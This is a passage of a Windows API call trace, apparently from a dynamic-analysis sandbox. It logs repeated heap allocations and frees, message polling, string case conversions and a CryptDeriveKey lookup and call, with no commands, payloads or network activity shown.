Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0166.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0166.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0166.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0166.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0166.033] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0166.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0166.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0166.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0166.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0166.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0166.034] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0166.034] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0166.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0166.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0166.035] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0166.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.035] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.035] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.035] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0166.036] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.036] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0166.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.036] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.037] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.037] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0166.037] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0166.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0166.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0166.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0166.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa430, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0166.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0166.040] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0166.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0166.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0166.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0166.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0166.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0166.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.041] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa56a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.042] HeapFree (in: 